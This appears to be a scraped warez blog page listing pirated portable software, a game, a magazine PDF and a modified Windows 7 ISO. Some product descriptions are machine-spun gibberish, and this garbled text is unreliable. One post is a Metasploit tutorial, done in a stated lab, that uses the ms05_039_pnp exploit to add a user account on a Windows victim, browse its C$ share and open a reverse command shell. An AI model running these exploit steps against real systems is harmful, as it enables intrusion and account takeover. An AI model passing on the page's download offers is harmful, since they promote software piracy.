WinUtilities 9.1 Portable | SOFTWARES

WinUtilities 9.1 Portable


WinUtilities 9.1 Portable | 6 Mb + 9.58 MB
WinUtilities is an accolade acceptable accumulating of accoutrement to optimize and speedup your arrangement performance. this apartment contains utilities to apple-pie registry, acting files on your disks, abolish your appliance and internet browser history, accumulation and cookies. it additionally supports to defragment your deejay drives and advance computer achievement and stability. congenital StartUp Cleaner allows you to ascendancy startup programs that amount automatically with windows, acquisition alike files, fix burst shortcuts and uninstall added software. added appearance accommodate defended book deletion, recycle bin shredding, arrangement aliment tasks scheduling and undelete deleted files.
What's new in WinUtilities 9.1?

* Improved WinUtilities Disk Cleaner module;
* Improved WinUtilities Registry Cleaner module;
* Improved WinUtilities History Cleaner module;
* Improved WinUtilities Shortcuts fixer module;
* Improved WinUtilities EXE Protector module;
* Improved WinUtilities File Shredder module;
* Improved the compatibility for windows 7 32bit/64bit;
* New application UI;
* Improved WinUtilities File Undelete module;
* Improved WinUtilities DiskDefrag module

DOWNLOAD HERE
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

Wheels of Steel American Long Haul | Games

Wheels of Steel American Long Haul | 190 MB
Build your empire one rig at a time to dominate the roadways and outbid the competition. Can you handle the pressure? Your American Dream starts behind the wheel of your own big rig.


Wheels of
 Steel American Long Haul

Wheels 
of Steel American Long Haul

Wheels of Steel American Long Haul

Wheels 
of Steel American Long Haul 
 
 
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

Science - 5 February 2010 (US) | Ebooks

Science - 5 February 2010 (US)

Science - 5 February 2010 (US)
English | 138 pages | PDF | 65.70 Mb

Science, a multi disciplinary, account associate advised journal, ranks as the world's best celebrated accurate journal. The account was accustomed by Thomas Edison in 1880 and has been the official account of AAAS back 1900. Content includes aboriginal research, news, book reviews, and advantage of contest in the accurate community.

DOWNLOAD HERE
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

Hacking Using Metasploit

Today,I am going to make a tutorial on Metasploit.

It is a great tool and it can be downloaded from:
http://www.metasploit.com/

The best thing is it is available for everyone for free.

It is very easy to use and I am going to show you now.

Scenario:
** I am demonstrating this in my security lab
** The attacker computer will be 192.168.1.9 (Linux Backtrack 4)
** The victim computer will be 192.168.1.10

First of all,open up Metaploit


This is the interface of Metasploit and it is ready for you to insert the command.

The first command that will be entered to the shell is

** show exploits

Basically,this command will show all the exploits that can be used by the attacker.

Press ENTER and all the exploits will be shown to the attacker.

Now,the attacker is going to choose the exploit.

In this case,the attacker will use ms05_039_pnp exploit.



The command to use the exploit is
** use ms_035_pnp

Press ENTER and the exploit will be used.

Now,we are going to see what the exploit can do for the attacker.

The attacker will now issues this command
** show payloads

Press on ENTER and all the payloads will be shown to the attacker.

In this case,the attacker is going to add an user to the victim computer.

The command that will be issues is
** set payload windows/adduser

Press on ENTER and that payload will be used.

The next thing that the attacker needs to do is set the target.

The attacker now needs to issues this command to see the target list
** show targets

After the attacker has determine the target,the next thing is to set the target.

The command that can be used is
** set target 0

The number will be according to the victim operating system.

The next steps will be show the fields that need to fill up by the attacker.

The command will be
** show options

There will be empty fields that need to be filled by the attacker.

In this case,the empty fields are RHOST and PASS.

RHOST stands for Remote Host (victim IP address).

PASS stands for Password.

To set both of them,the commands are
** set RHOST 192.168.1.10
** set PASS 12345



The attacker is setting remote host.

The attacker is setting Password.

Finally,the last command that need to be used is
** exploit


The exploit command will call Metasploit to launch the attack to the victim.

Press ENTER and Metasploit will launch the attack.

Now the attacker know that he has an account at the victim machine.

Account information:
username = Metasploit
password = 12345

Now it is the time for the attacker to enter the victim machine.

The attacker will open up a RUN box.

In the RUN box,the attacker will type in
** \\192.168.1.10\c$

Press ENTER and a login prompt will pop up.

Attacker needs to enter the username and password for the victim machine.

In this case,the username and password are Metasploit and 12345.



Press ENTER and the attacker is in the victim machine




The above picture shows that the attacker is in the C drive of victim machine.

What can a victim see on his machine?

If the victim launch a Command Prompt and type in
** net user

The result will be

Do you see that?

The username "metasploit" is there.

That is the username that the attacker created.

The commands that I used:
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit

Now ,the game will be more interesting.

I will be using Metasploit to get a Command Prompt from the victim machine.

For a hacker,a Command Prompt is very useful.

Scenario:
** This is done in my security labs
** The attacker is 192.168.1.9 (Linux Backtrack 4)
** The victim is 192.168.1.10 (Windows OS)
** The version of Metasploit is version 2

First of all,open up Metasploit and issues the "show exploits" command.

A list of exploits will be shown at the screen.

I will be using the same exploit which is "ms05_039_pnp"


Next,I will be issuing the "show PAYLOADS" command in order to show out what I can achieve from the exploit.

A list of payloads will be shown to me.

In this tutorial,I will be using win32_reverse.

This mean if the exploit is successful,I will get a Command Prompt from the victim computer.



We need to set the target now.

You need to choose your victim's operating system here.


From the above picture,you can see that the target can be either Windows 2000 or Windows XP.

Therefore,set your target accordingly.

I will be setting my target using "set target 0".

Then,I will be issuing the "show options" command in order to fill in the required information such as Remote Host IP address and Local Host IP address.

Remote Host = Victim IP address
Local Host = Your IP address

Now,I need to set both of them in order for the exploit to work.

Finally,I will issue the last command which is "exploit".


As you can see from the picture above,I got a shell from the victim computer.

To prove I can do something at the victim computer,I will now add a text file on victim's desktop.



From the above picture,

Message:
** This is a demonstration of hacking from 192.168.1.9

Text File Name:
** Hack.txt

If this works,the victim's desktop will has a text file called hack.txt and the information of the text file will be the message above.

Let look at the victim's desktop:

The victim's desktop has a text file called hack.txt.

I will open it up and show you the information inside the text file:



I will end the tutorial here.


The Orignal Artical For This Tutorial Is On Milw0rm.
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

Windows 7 Netbook Edition Build | SOFTWARES




Windows 7 Netbook Edition Build 7264 X86 (Reupload 01-29-2010)


File: Windows.7.x86.Build.7264.Netbook.Edition.iso
Size: 1 480 4275 20 bytes
MD5: 5EAEE9B6CBA905FF5691FD172F32E427
SHA1: 8B49F2A7A8DB22004985AD7E905435753545A82A
CRC32: 02404775

The Eee7 is a special version of Windows 7 Ultimate, based on the last edition 7264, made by the group "ModMyEee" and occupies only 1,49 GB USB drive and at 4 Gb hard disk. Operates on any netbook, the Eee PC 7 "4GB, until the last Sony Vaio P series and is faster and the XP SP3. No major operation has not been deducted. All networking capabilities remained intact. Hardware support is not removed.
Some of the things that have been removed:
Old drivers, games, Asian languages (can be added later), the files, and more.

System Requirements:
Hard Drive 4GB
RAM 256mb (recommended 1GB)
CPU according to the netbook, 900 MHz +

The above iSO file is not bootable from a USB Stick, to make it bootable from a USB Stick follow the instructions below

Important Information:

* When installing Eee7, The final phase of installation (Finalizing Installation) could take some time depending on the netbook to have.

* If you do not have drivers for Vista to install the devices , then simply download the drivers for XP, go to the executable file (. Exe) that you downloaded, right click -> Properties -- > Compatibility and check the option "Run this program in compatibility mode" for:
Windows XP (Service Pack 2)

To be able to install the netbook due to lack of dvd drive,we should prepare a USB Flash to make it bootable.

What we need:

* USB Flash Drive (2GB + more)
* The DVD which we burned the image of the iso that you downloaded
* A computer with Vista / Windows 7

Step 1: Formating the USB Flash

The following steps we will use the command prompt to create the appropriate Usb flash fomat with diskpart. [Note: It will erase all the data on USB Flash, be careful.]

1. Connect the USB Flash Drive

2. Open the command prompt as ............. (Go Start> All Programs> Accesories, right click on the "Command Prompt" and select "Run as ............."

3. To find out what number corresponds to the USB Flash Drive you should type the following in the window of the "Command Prompt":
diskpart
list disk
The number corresponding to your USB will be appear in the list (see the USB and the capacity of)
This number will need in the next step. Suppose that the USB Flash Drive is the disk 1.

4. Format the USB typing the following commands in the same window. Attention, replace the number "1" on disk 1 to the number of your drive as emerged from the above list.
select disk 1
clean
create partition primary
select partition 1
active
format fs = NTFS
assign
exit
When you enter this, you will have a USB Flash Drive formatted ready to be bootable.

Step 2: Let's make the USB bootable
we will use the application bootsect that is in the EEE7 DVD.
We will use the same command prompt window from Step 1:
1. Put the dvd of Eee7 in the drive of your computer.
2. Change the drive in the command prompt with that which is your drive. Suppose that the DVD drive is D:
d:
cd d: \ boot
3. We will use the bootsect to define the USB as a bootable NTFS drive ready to accept the Eee7.
Suppose that the USB Flash Drive is G: \, your position in G: \ put the letter of your USB.
Enter:
bootsect / nt60 g:
4. You can close the command prompt,now the USB is bootable.

Step 3: Copy files from DVD to USB Flash drive
The easiest way is through the windows. Copy all files from DVD and paste it in the USB flash drive. Just copy all the files, you're ready.

Step 4: Set the BIOS to boot from USB


Size : 1412 MB


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

EIAS Animator v8.0 Portable | SOFTWARES

EIAS Animator v8.0 Portable





Electric Image Animation Studio is widely used in Hollywood and professional studios around the world. ASIS is a three-dimensional software, without which there can do anything a CGI artist. For nearly 15 years, developed and complemented by an application that allows you to create more three-dimensional graphics. If you hope to create animations in the style of Hollywood, the Electric Image Animation Studio is for you.


The main features of the product:


- Almost all features can be animated in EIAs.

- ASIS can import animations from other applications via BVH and FBX formats.

- ASIS can import data from Boujou and SynthEyes and MatchMover.

- With ASIS funutsy can animate the objects naturally.


EIAS 
Animator v8.0 Portable

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS

AutoRun Pro Enterprise II v4.0.0.58 Portable | Softwares

Features:


� Display of every registered document (e.g.: TXT, DOC, HTML) via automatic start of the corresponding application.

� Print of every registered document (e.g.: TXT, DOC, HTML) via automatic start of the corresponding application.

� Start any program.

� Start the default browser with document URL.

� Send email.

� Integrated Web browser and internal commands.

� Integrated sound player.

� Integrated RTF (Rich Text) viewer.

� Integrated Media Player.

� Slide Show images (Photo album), more than 100 styles.

� Background color, Gradient color and Transparent Form.

� Background sound.

� Splash screen, splash screen sound.

� Full screen background and logo image.

� License agreement. You can display a license agreement before any files are launched. The user is required to accept the license in order to continue. If the user does not accept the license, then the AutoRun exits.

� Security. You can protect your CD from being started by unlicensed users by requiring users to submit a User Name and Password or an Authentication Code.

� Exit Form. Show information or confirm exit before program exits

� Unlimited Sub Pages.

� Page FadeIn, FadeOut.

� Images include bitmap, icon, JPEG, EMF, WMF, GIF (Static or Animated), PNG images.

� Page template.

� Object template.

� CD Icon and Page icon can be displayed in the title bar.

� Test without burning CD.

� Burn project to CD-R/CD-RW directly with built-in CD Burner.

� Create a single executable file.

� Publish project to new folder.

� Create ISO CD-ROM image file.

� Install Software - You may want to install a default viewer for the files if the user does not have one on his computer. For example, if you are launching a PDF file, you may want to include Adobe Acrobat Reader software on your CD and install it if the user does not already have it installed. You can define one or more files to be installed.

� Create drop down menu bar (main menu), tool bar and status bar for pages like most standard windows to make your page more professional.

� Create popup menu, you can define the pop-up menu that appears when the user clicks on an object or page background with the right mouse button, like most professional applications.

� CD expire date, Specifies an expiration date for the CDs.

� Set object(s) Enable or Disable, Show or Hide Object(s).

� No programming knowledge required.

� No registry entry necessary.

� Runs from CD-ROM without installation.

� No runtime module required.


AutoRun 
Pro Enterprise II v4.0.0.58 Portable

CLICK HERE TO DOWNLOAD
  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS